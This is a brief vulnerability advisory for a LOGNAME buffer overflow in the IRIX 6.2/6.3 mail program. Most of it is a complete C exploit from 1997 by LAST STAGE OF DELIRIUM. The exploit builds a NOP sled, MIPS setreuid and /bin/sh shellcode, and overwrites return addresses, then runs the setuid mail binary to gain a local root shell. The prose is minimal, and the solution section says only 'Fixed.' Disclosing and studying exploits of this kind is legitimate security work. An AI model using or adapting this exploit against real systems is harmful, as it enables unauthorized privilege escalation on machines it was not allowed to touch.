COMMAND
mail
SYSTEMS AFFECTED
IRIX 6.2, 6.3
PROBLEM
There exists a buffer overflow vulnerability in the mail program
in the way the LOGNAME environment variable is handled. It is
possible to exploit this bug and locally gain root user
privileges.
/*## copyright LAST STAGE OF DELIRIUM sep 1997 poland *://lsd-pl.net/ #*/
/*## /usr/bin/mail #*/
#define ADRNUM 228
#define PCHNUM 440
#define TMPNUM 228
#define NOPNUM 5000
#define ALLIGN 3
char setreuidcode[]=
"\x30\x0b\xff\xff" /* andi $t3,$zero,0xffff */
"\x24\x02\x04\x01" /* li $v0,1024+1 */
"\x20\x42\xff\xff" /* addi $v0,$v0,-1 */
"\x03\xff\xff\xcc" /* syscall */
"\x30\x44\xff\xff" /* andi $a0,$v0,0xffff */
"\x31\x65\xff\xff" /* andi $a1,$t3,0xffff */
"\x24\x02\x04\x64" /* li $v0,1124 */
"\x03\xff\xff\xcc" /* syscall */
;
char shellcode[]=
"\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */
"\x24\x02\x03\xf3" /* li $v0,1011 */
"\x23\xff\x01\x14" /* addi $ra,$ra,276 */
"\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */
"\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */
"\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */
"\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */
"\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */
"\x03\xff\xff\xcc" /* syscall */
"/bin/sh"
;
char jump[]=
"\x03\xa0\x10\x25" /* move $v0,$sp */
"\x03\xe0\x00\x08" /* jr $ra */
;
char nop[]="\x24\x0f\x12\x34";
main(int argc,char **argv){
char buffer[10000],adr[4],pch[4],tmp[4],*b,*envp[3];
int i;
printf("copyright LAST STAGE OF DELIRIUM sep 1997 poland //lsd-pl.net/\n");
printf("/usr/bin/mail for irix 6.2 6.3 IP:17,19,20,21,22,32\n\n");
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10264+2500+228+228;
*((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10264+112+32356;
*((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+10264+7000;
envp[0]=buffer;
envp[1]=&buffer[8000];
envp[2]=0;
b=buffer;
sprintf(b,"xxx=");
b+=4;
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
for(i=0;i<TMPNUM;i++) *b++=tmp[i%4];
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
*b=0;
b=&buffer[8000];
sprintf(b,"LOGNAME=");
b+=8;
for(i=0;i<ALLIGN;i++) *b++=0xff;
for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
*b=0;
execle("/usr/bin/mail","lsd",0,envp);
}
SOLUTION
Fixed.